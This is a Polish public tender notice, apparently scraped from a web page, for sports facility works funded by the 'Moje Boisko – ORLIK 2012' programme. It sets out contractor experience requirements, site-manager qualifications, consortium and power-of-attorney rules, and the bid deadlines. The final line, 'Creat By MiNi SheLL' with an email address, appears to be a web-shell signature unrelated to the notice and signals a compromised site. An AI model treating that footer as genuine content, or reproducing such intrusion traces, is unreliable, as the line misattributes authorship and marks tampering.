jeżeli okres działalności jest krótszy – w tym okresie wykonał jedną należycie wykonaną robotę budowlaną obejmującą budowę lub przebudowę lub remont na obiekcie sportowym - nawierzchni z poliuretanu o powierzchni co najmniej 500 m2 <br/><br/>c)	Zamawiający uzna, że Wykonawca spełnia warunek jeżeli wykaże, że: w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał jedną należycie wykonaną robotę budowlaną obejmującą budowę lub przebudowę lub remont placu zabaw lub siłowni na wolnym powietrzu lub obiektu małej architektury- o powierzchni co najmniej 80 m2 <br/><br/>Uwaga: Pojęcie budowa, przebudowa, remont należy rozumieć zgodnie z definicjami zawartymi w ustawie Prawo Budowlane (t.j. Dz.U. z 2025r. poz. 418).<br/>Uwaga : Jeżeli Wykonawca nabył doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, to wykonane roboty muszą dotyczyć robót budowlanych , w których wykonywaniu wykonawca ten bezpośrednio uczestniczył. <br/>Uwaga : Mając na uwadze art. 117 ust. 1 Pzp Zamawiający nie określa, szczególnego sposobu spełniania określonego wyżej warunku, przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (brak skorzystania z dyspozycji zawartej w art. 117 ust. 1 ustawy Pzp), co oznacza możliwość sumowania zasobów w tym zakresie. <br/>Możliwe jest sumowanie doświadczenia pomiędzy wykonawcami wspólnie ubiegającymi się o zamówienie jeżeli co najmniej jeden z wykonawców spełnia warunek wskazany w ust 1 pkt 4) litera a) a drugi wykonawca spełnia warunek wskazany w ust 1 pkt 4 litera b). <br/><br/>Uwaga : W związku z art. 117 ust 3 Pzp w odniesieniu do warunków dotyczących doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonają roboty budowane, do realizacji których te zdolności są wymagane.<br/><br/>Uwaga : W związku z art. 118 ust. 2 Pzp w odniesieniu do warunków dotyczących doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/><br/>5)	Zdolność techniczna lub zawodowa w zakresie kwalifikacji zawodowych : <br/>Wykonawca musi wykazać dysponowanie co najmniej jedną osobą posiadającą prawo do wykonywania samodzielnych funkcji technicznych w budownictwie tj. odpowiednie uprawnienia budowlane w zakresie kierowania robotami w specjalności:<br/>a)	konstrukcyjno-budowlanej - osoba ta będzie pełniła funkcję Kierownika Budowy;<br/>b)	instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych- osoba ta będzie pełniła funkcje Kierownika Robót; <br/>c)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych- osoba ta będzie pełniła funkcję kierownika Robót.<br/>lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. <br/>oraz zrzeszoną/ymi we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2023r. poz. 551),<br/>lub spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz.U. z 2025r. poz. 418) tj. osobą/ami której/których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”).<br/>Uwaga: Zamawiający dopuszcza możliwość łączenia uprawnień budowlanych różnych branż przez jedną osobę.<br/><br/>Uwaga: W związku z art. 117 ust 3 Pzp w odniesieniu do warunków dotyczących kwalifikacji zawodowych, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonają usługi do realizacji których te zdolności są wymagane.<br/>Uwaga: W związku z art. 118 ust. 2 Pzp w odniesieniu do warunków dotyczących kwalifikacji zawodowych Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi do realizacji których te zdolności są wymagane. W przypadku powoływania się na zdolności podmiotu udostępniającego zasoby Wykonawca składa zobowiązanie tego podmiotu do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.<br/>Uwaga : Mając na uwadze art. 117 ust. 1 Pzp Zamawiający nie określa, szczególnego sposobu spełniania określonego wyżej warunku, przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (brak skorzystania z dyspozycji zawartej w art. 117 ust. 1 ustawy Pzp), co oznacza możliwość sumowania zasobów w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą należy złożyć (dotyczy oferty składanej w odpowiedzi na ogłoszenie o zamówieniu): 1)Oświadczenie Wykonawcy/ wykonawców wspólnie ubiegających się o zamówienie składane na podstawie art. 125 ust 1 Pzp - zgodnie z Załącznikiem Nr 2 do SWZ Oświadczenie to składa Wykonawca, każdy ze wspólników w przypadku składania oferty wspólnie przez konsorcjum lub spółkę cywilną. Jeżeli oświadczenia składają wykonawcy wspólnie ubiegający się o zamówienie: oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia) Oświadczenie w zakresie spełniania warunków udziału w postępowaniu składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie; Dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów, jeżeli każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia spełnia postawiony warunek. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia może zaistnieć sytuacja, że tylko jeden z nich spełnia określony warunek udziału postawiony w postepowaniu - w takiej sytuacji wykonawca, który nie spełnia warunku udziału wykreśli treść oświadczenia w zakresie spełnieniu określonego warunku udziału z oświadczenia. 2)	Informacja z KRKi CEiDG lub innego właściwego rejestru- w celu potwierdzenia, że osoba działające w imieniu wykonawcy jest umocowana do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia tych dokumentów jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. 3)	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentacji dla określonej osoby reprezentującej Wykonawcę – jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentacji nie wynika z dokumentów o których mowa w pkt 2. 4)	Pełnomocnictwo ustanowione do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ustanowienie pełnomocnika może być dokonane w umowie konsorcjum lub odrębnym dokumencie pełnomocnictwa. Umowę konsorcjum lub pełnomocnictwo z którego wynika komu udzielono pełnomocnictwa należy dołączyć do oferty. Pełnomocnictwo może być do ich reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. W przypadku spółki cywilnej pełnomocnictwo do występowania w imieniu tej spółki lub umowa spółki cywilnej, z której wynika upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki (nie dotyczy jeżeli wszyscy wspólnicy spółki cywilnej podpiszą ofertę). 5)	Oświadczenie, o którym mowa w art. 117 ust. 4 Pzp („(…) z którego wynika, które Roboty, usługi wykonają poszczególni wykonawcy.”) – o ile dotyczy (odnosi się do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w tym do wykonawców prowadzących działalność w formie spółki cywilnej - Załącznik Nr 6 do SWZ.<br/>6)	Przedmiotowe środki dowodowe na potwierdzenie równoważności, o których mowa w Rozdziale 8 SWZ.<br/>Ciąg dalszy w informacjach dodatkowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	Pełnomocnictwo <br/>1)	wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Oznacza to że ustanowienie pełnomocnika do reprezentowania wspólników w postepowaniu o udzielenie zamówienia jest obowiązkowe. Ustanowienie pełnomocnika może być dokonane w umowie konsorcjum lub odrębnym dokumencie pełnomocnictwa. Umowę konsorcjum lub pełnomocnictwo z którego wynika komu udzielono pełnomocnictwa należy dołączyć do oferty. <br/>Obowiązek wyznaczenia przedstawiciela uprawnionego do reprezentacji współwykonawców w stosunkach z zamawiającym dotyczy również spółki cywilnej.<br/>2)	w przypadku spółki cywilnej wystarczającym będzie gdy upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynikać będzie z dołączonej do oferty umowy spółki cywilnej lub uchwały wspólników, wskazującej jednego ze wspólników jako umocowanego do reprezentacji spółki (wszystkich wspólników). Ofertę może podpisać wyznaczony pełnomocnik lub wszyscy wspólnicy spółki. <br/>3)	dokument pełnomocnictwa powinien określać postępowanie o udzielenie zamówienia, którego dotyczy, wymieniać wykonawców ubiegających się wspólnie o udzielenie zamówienia (mocodawców), oraz określać osobę pełnomocnika oraz zakres jego umocowania, <br/>4)	dokument pełnomocnictwa musi być podpisany przez wszystkich wykonawców ubiegających się wspólnie o zamówienie, <br/>3.	Korespondencja z Pełnomocnikiem - wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia, na adres wskazany w ofercie jako adres do korespondencji.<br/>4.	Oświadczenie o którym mowa w art. 125 ust 1 Pzp (Załącznik Nr 2 do SWZ) : <br/>1)	w zakresie braku podstaw do wykluczenia Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>2)	w zakresie spełnienia warunków udziału- Oświadczenie w zakresie spełniania warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie;<br/>	dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.<br/>1)	W przypadku, o którym mowa w art. 117 ust. 2 lub 3 ustawy Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są dołączyć do oferty oświadczenie, o którym mowa w art. 117 ust. 4 ustawy („(…) z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.”)- (Załącznik Nr 6 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany w umowie. Zakres tych zmian ujęto w § 12 Projektowanych Postanowień Umownych (Załącznik Nr 3 do SWZ) .Zmiany dot. przedłużenia terminu, zmiany wynagrodzenia, w zakresie przedmiotu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ofertę należy złożyć za pośrednictwem Platformy przetargowej, na której Zamawiający prowadzi postępowanie,bezpośredni link do postępowania podano w Rozdziale 1 ust 12 SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-16 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-14</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamówienie jest Dofinansowane ze środków Funduszu Rozwoju Kultury Fizycznej, w Ramach Programu Modernizacji Kompleksów Sportowych „Moje Boisko- ORLIK 2012” – Edycja 2024. Minister Sportu i Turystyki udziela dofinansowania.<br/><br/>Ciąg Dalszy dot dokumentów jakie nalezy złożyć z ofertą: <br/>Jeżeli Wykonawca korzysta z Podmiotu Udostepniającego Zasoby (PUZ)<br/>na zasadach określonych w art. 118 ustawy Pzp to <br/>wraz z ofertą dodatkowo należy złożyć :<br/><br/>7)	Oświadczenie Podmiotu Udostępniającego Zasoby składane zgodnie z art. 125 ust 1 ustawy Pzp – zgodnie z Załącznikiem Nr 5 ;<br/>8)	Zobowiązanie Podmiotu Udostępniającego Zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia na Załączniku Nr 7 do SWZ lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie to potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów;<br/>9)	Informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru- w celu potwierdzenia, że osoba działające w imieniu Podmiotu Udostępniającego Zasoby jest umocowana do jego reprezentowania. Podmiot nie jest zobowiązany do złożenia tych dokumentów jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile podmiot wskazał dane umożliwiające dostęp do tych dokumentów np. w Oświadczeniu o którym mowa w pkt 7); <br/>10)	Pełnomocnictwo dla osoby działającej w imieniu Podmiotu Udostępniającego Zasoby na zasadach określonych w art. 118 ustawy Pzp jeżeli jest to osoba której umocowanie nie wynika z dokumentów o których mowa w pkt 9.

Creat By MiNi SheLL
Email: jattceo@gmail.com